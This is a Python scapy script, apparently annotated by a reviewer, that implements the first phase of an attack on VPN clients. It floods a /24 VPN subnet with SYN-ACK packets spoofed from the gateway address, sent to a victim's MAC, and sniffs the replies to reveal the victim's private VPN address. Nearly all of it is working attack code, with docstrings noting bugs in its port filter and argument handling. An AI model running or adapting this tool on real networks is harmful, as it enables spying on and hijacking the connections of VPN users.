

  1. #!/usr/bin/env python3
  2. from scapy.all import *
  3. import ipaddress
  4. from threading import Thread, Event
  5. from time import sleep
  6. import os
  7. #
  8. #
  9. #
  10. #
  11. # Thread classes for sniffing
  12. #
  13. # Sniffer Class all grabbed from https://www.cybrary.it/0p3n/sniffing-inside-thread-scapy-python/
class Sniffer(Thread):
    """Background packet sniffer that records a source address of interest.

    Runs scapy's ``sniff`` on ``iface`` in a daemon thread and hands every
    captured packet to :meth:`handle_packet`.

    Attributes:
        vpn_addr: the IP source recorded by :meth:`check_for_req`, or
            ``None`` until a match has been seen.
        current_phase: phase selector consulted by :meth:`check_for_req`;
            only phase ``1`` has any behaviour in this file.
        spoof_count, spoof_port: initialised here but never read or written
            by any method of this class.
        socket: the L2 listening socket opened in :meth:`run`; nothing in
            this class closes it.
        stop_sniffer: an ``Event`` set by :meth:`join`.  ``sniff`` is called
            without a ``stop_filter`` and no method waits on the event, so
            setting it does not end the capture.

    NOTE(review): the listing this was recovered from had its indentation
    stripped; the block nesting below is reconstructed from the code.
    """

    def __init__(self, iface: str = "en0") -> None:
        """Create a daemon sniffer thread bound to ``iface`` (not yet started)."""
        super().__init__()
        self.daemon = True
        self.vpn_addr = None
        self.current_phase = 1
        self.spoof_count = 0
        self.spoof_port = 0
        self.socket = None
        self.iface = iface
        self.stop_sniffer = Event()

    def run(self) -> None:
        """Thread body: open an L2 listening socket filtered to IP and sniff indefinitely.

        ``sniff`` is given no ``stop_filter``, ``count`` or ``timeout``, so it
        only returns when the socket goes away or the process exits.
        """
        self.socket = conf.L2listen(
            type=ETH_P_ALL,
            iface=self.iface,
            filter="ip"
        )
        sniff(
            opened_socket=self.socket,
            prn=self.handle_packet,
        )

    def join(self, timeout=None) -> None:
        """Set ``stop_sniffer`` and wait for the thread.

        Because :meth:`run` never consults the event, this only returns when
        the underlying ``sniff`` call ends on its own or ``timeout`` elapses.
        """
        self.stop_sniffer.set()
        super().join(timeout)

    def get_vpn_addr(self):
        """Return the address recorded so far (``None`` if nothing has matched)."""
        return self.vpn_addr

    def set_phase(self, phase: int) -> None:
        """Select the phase consulted by :meth:`check_for_req`."""
        self.current_phase = phase

    def check_for_req(self, packet) -> None:
        """Record the packet's IP source address when it matches the phase-1 test.

        Phase 1 only: any IP source whose dotted form contains the substring
        ``"10."`` counts as a match.  This is a plain substring test, not a
        prefix or subnet test, so an address such as ``192.168.10.5`` also
        matches.  A repeat of the already-recorded address is reported and
        then re-assigned.
        """
        ip_layer = packet.getlayer(IP)
        # for phase 1 (on ubuntu 19) we wanna look for a reset
        # with source of private vpn address and dest of gateway
        if self.current_phase == 1:
            if "10." in ip_layer.src:
                if ip_layer.src == self.vpn_addr:
                    print("multiple matches for: " + str(self.vpn_addr))
                    # could make the scan stop after this point but
                    # only takes a second or two to finish up
                print("Victim private ip is: " + str(ip_layer.src))
                self.vpn_addr = ip_layer.src

    def handle_packet(self, packet) -> None:
        """``sniff`` callback: hand TCP packets that pass the port test to :meth:`check_for_req`.

        The comment below says the port test is meant to skip SSH traffic
        (ports 22 and 2222).  As written, ``A or B`` with two ``and`` clauses
        is false only when one port is 2222 *and* the other is 22; every
        other TCP packet, including ordinary port-22 SSH, is passed on.
        """
        # if its not an SSH packet then check for challenge acks
        if TCP in packet:
            tcp_sport = packet[TCP].sport
            tcp_dport = packet[TCP].dport
            if (tcp_sport != 2222 and tcp_dport != 2222) or (tcp_sport != 22 and tcp_dport != 22):
                self.check_for_req(packet)
  64. ############
def phase_one_spread(gateway_ip, dst_net, iface="en0", edst="08:00:27:5c:c9:d1",
                     sport=50505, dport=443, flags="SA"):
    """Send crafted TCP segments to every address of ``dst_net``/24 via ``iface``.

    Parameters:
        gateway_ip: used verbatim as the IP source of every packet (the
            derived ``.1`` address computed first is dead code, see below).
        dst_net: dotted-quad network base; ``"/24"`` is always appended, so
            the range is a /24 regardless of what the caller intended.
        iface: interface handed to ``sendp``.
        edst: Ethernet destination MAC for every frame.
        sport, dport, flags: TCP header fields; one ``TCP`` object is reused
            for every packet.

    Raises:
        ValueError: from ``ipaddress.IPv4Network`` when ``dst_net`` has host
            bits set (the constructor is strict by default) or is not a
            valid dotted quad.

    Iterating an ``IPv4Network`` yields every address including the network
    and broadcast addresses.  Each address receives ``count=2`` copies with
    ``verbose=0``; progress is printed and nothing is returned.
    """
    pieces = gateway_ip.split('.')
    src = pieces[0] + '.' + pieces[1] + '.' + pieces[2] + '.1'# should be gateway of LAN
    # NOTE: the ".1" value above is overwritten immediately and never used.
    src = gateway_ip
    eth = Ether(dst=edst)
    tcps = TCP(sport=sport,dport=dport,flags=flags) # src and dst ports don't matter
    for ip in ipaddress.IPv4Network(dst_net + '/24'):
        print('{} to: {}'.format(flags, str(ip)))
        ip_pack = IP(src = src, dst = str(ip))
        sendp(eth/ip_pack/tcps, iface=iface, count=2, verbose=0)
    print("\nFinished spreading to private address space.")
def main():
    """Command-line entry point.

    Positional arguments, in order: gateway IP, VPN subnet base, interface,
    victim MAC; then optional source port, destination port and TCP flags.
    The usage text advertises two optional arguments while the code reads up
    to three (``argv[5]``..``argv[7]``), and each optional value is only
    consumed at one exact ``len(sys.argv)``: with seven arguments ``dport``
    is taken from ``argv[6]`` but ``sport`` silently keeps its default.

    ``sys`` is not imported explicitly in this file; it is only in scope here
    if ``from scapy.all import *`` re-exports it — NOTE(review): confirm.
    The sniffer thread is started but never joined; it is a daemon thread, so
    it ends with the process.

    NOTE(review): the listing this was recovered from had its indentation
    stripped; the block nesting below is reconstructed from the code.
    """
    if len(sys.argv) < 5:
        print("Usage:\n{} {} {} {} {} [{}] [{}]".format(
            sys.argv[0], "<GATEWAY_IP>", "<VPN SUBNET>", "<IFACE>", "<VICTIM_MAC>",
            "<SPORT>", "<>"))
        exit(-1)
    gateway_ip = sys.argv[1]
    vpn_net = sys.argv[2]
    iface = sys.argv[3]
    edst = sys.argv[4]
    # Each optional argument is only picked up at one exact argv length (see docstring).
    if len(sys.argv) == 6:
        sport = int(sys.argv[5])
    else:
        sport = 50505
    if len(sys.argv) == 7:
        dport = int(sys.argv[6])
    else:
        dport = 443
    if len(sys.argv) == 8:
        flags = sys.argv[7]
    else:
        flags = "SA"
    sniffer = Sniffer(iface=iface)
    sniffer.start()
    ## Phase 1 - spread private address range passed in
    #
    # presumably gives the sniffer thread time to open its socket before
    # any packets are sent — confirm
    sleep(.5)
    print("Scanning entire dest net " + str(vpn_net))
    phase_one_spread(gateway_ip, str(vpn_net),
                     iface=iface, edst=edst,
                     sport=sport, dport=dport, flags=flags)
    # Read immediately after the send loop returns; anything the sniffer
    # records after this point is not reported.
    vpn_addr = sniffer.get_vpn_addr()
    print('Completed phase one and found client has private VPN address: ' + str(vpn_addr) + '\n\n')
# Script entry guard: run main() only when executed directly, not on import.
if __name__ == '__main__':
    main()